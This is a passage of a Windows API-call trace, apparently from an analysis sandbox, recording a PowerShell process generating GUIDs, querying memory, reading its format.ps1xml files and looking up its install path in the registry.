	[0143.147] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x9b719487, Data2=0x5b41, Data3=0x4170, Data4=([0]=0x8f, [1]=0xb0, [2]=0x1f, [3]=0xe1, [4]=0xca, [5]=0xe1, [6]=0x6c, [7]=0xe))) returned 0x0
	[0143.147] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xa8a0789c, Data2=0x2d31, Data3=0x4b43, Data4=([0]=0x9d, [1]=0xc2, [2]=0x80, [3]=0xdf, [4]=0xe, [5]=0xa6, [6]=0xa7, [7]=0x48))) returned 0x0
	[0143.147] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xed318dae, Data2=0x568e, Data3=0x4245, Data4=([0]=0x97, [1]=0x1, [2]=0x31, [3]=0x84, [4]=0xa, [5]=0x35, [6]=0x3c, [7]=0xc8))) returned 0x0
	[0143.147] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf85bb0c9, Data2=0xf2c1, Data3=0x4349, Data4=([0]=0x85, [1]=0x95, [2]=0x81, [3]=0x2c, [4]=0x9, [5]=0xdc, [6]=0xc5, [7]=0x3e))) returned 0x0
	[0143.148] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xbbec2e6d, Data2=0x14a5, Data3=0x4634, Data4=([0]=0x89, [1]=0xe6, [2]=0xea, [3]=0xbc, [4]=0x31, [5]=0xf6, [6]=0xa5, [7]=0xec))) returned 0x0
	[0143.148] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xcf04b88a, Data2=0xa8d, Data3=0x48c1, Data4=([0]=0x92, [1]=0x2b, [2]=0x24, [3]=0xc, [4]=0xa7, [5]=0x8c, [6]=0x15, [7]=0x13))) returned 0x0
	[0143.148] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xd7c427cf, Data2=0x8288, Data3=0x4ed2, Data4=([0]=0xb0, [1]=0x91, [2]=0x6c, [3]=0x13, [4]=0x5d, [5]=0x8a, [6]=0x5f, [7]=0x9b))) returned 0x0
	[0143.148] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xbcdf55d, Data2=0x9439, Data3=0x4f07, Data4=([0]=0xb6, [1]=0x5e, [2]=0xdd, [3]=0x7b, [4]=0x80, [5]=0xb7, [6]=0x9a, [7]=0x55))) returned 0x0
	[0143.149] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x215efc9f, Data2=0xd0f, Data3=0x4233, Data4=([0]=0x88, [1]=0x13, [2]=0x44, [3]=0x64, [4]=0x37, [5]=0xd6, [6]=0x83, [7]=0x9))) returned 0x0
	[0143.149] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.149] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.150] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.151] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb0ea21f3, Data2=0x1799, Data3=0x448b, Data4=([0]=0xa2, [1]=0x8d, [2]=0xd, [3]=0xe3, [4]=0x64, [5]=0xe8, [6]=0xd0, [7]=0xfe))) returned 0x0
	[0143.151] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.151] SetErrorMode (uMode=0x1) returned 0x1
	[0143.152] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0143.152] GetFileType (hFile=0x318) returned 0x1
	[0143.152] SetErrorMode (uMode=0x1) returned 0x1
	[0143.152] GetFileType (hFile=0x318) returned 0x1
	[0143.152] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.154] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.155] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.155] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.156] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.156] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.156] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x119, lpOverlapped=0x0) returned 1
	[0143.157] ReadFile (in: hFile=0x318, lpBuffer=0x36a62a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x36a62a0*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.157] CloseHandle (hObject=0x318) returned 1
	[0143.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.157] SetErrorMode (uMode=0x1) returned 0x1
	[0143.157] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0143.157] SetErrorMode (uMode=0x1) returned 0x1
	[0143.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.158] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x318) returned 0x0
	[0143.158] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0143.158] CoTaskMemAlloc (cb=0x5a) returned 0x1b7ad950
	[0143.158] RegQueryValueExW (in: hKey=0x318, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7ad950, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0143.158] CoTaskMemFree (pv=0x1b7ad950) 
	[0143.158] RegCloseKey (hKey=0x318) returned 0x0
	[0143.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.158] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0143.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.160] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.161] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0143.161] VirtualQuery (in: lpAddress=0x14ba40, lpBuffer=0x14c900, dwLength=0x30 | out: lpBuffer=0x14c900*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.161] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x9194b80c, Data2=0x7e1, Data3=0x4c22, Data4=([0]=0xbc, [1]=0x74, [2]=0x1f, [3]=0x8e, [4]=0x37, [5]=0x12, [6]=0x72, [7]=0xfa))) returned 0x0
	[0143.162] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.162] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x221f6326, Data2=0x14a4, Data3=0x4f80, Data4=([0]=0x9c, [1]=0x12, [2]=0x41, [3]=0x68, [4]=0x75, [5]=0x9a, [6]=0xc, [7]=0x25))) returned 0x0
	[0143.163] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x6e542f95, Data2=0x553e, Data3=0x4542, Data4=([0]=0xa1, [1]=0xc9, [2]=0x61, [3]=0x83, [4]=0x4d, [5]=0xd2, [6]=0x6, [7]=0x93))) returned 0x0
	[0143.163] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x9c3e7df5, Data2=0x6b40, Data3=0x476d, Data4=([0]=0xba, [1]=0x1b, [2]=0x4b, [3]=0x91, [4]=0xbe, [5]=0xc, [6]=0x5, [7]=0x99))) returned 0x0
	[0143.163] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.164] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0143.164] SetErrorMode (uMode=0x1) returned 0x1
	[0143.164] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x318
	[0143.164] GetFileType (hFile=0x318) returned 0x1
	[0143.164] SetErrorMode (uMode=0x1) returned 0x1
	[0143.164] GetFileType (hFile=0x318) returned 0x1
	[0143.165] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.166] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.167] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.167] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.168] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.169] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.169] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.169] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.170] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.170] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.171] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.171] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.171] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.171] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.172] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.172] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.174] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.174] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.175] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.175] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.175] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.176] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.176] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.176] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.176] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.176] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.177] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.177] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.177] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.273] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.273] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.274] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.277] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.277] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.278] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.278] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.278] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.280] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.280] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.280] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.281] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.281] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.281] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.281] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.282] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.282] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.282] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.282] ReadFile (in: hFile=0x318, lpBuffer=0x3702440, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3702440*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
